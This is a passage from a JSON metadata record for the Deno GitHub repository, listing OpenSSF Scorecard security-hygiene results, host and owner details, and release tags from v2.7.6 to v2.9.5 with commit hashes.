.github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","de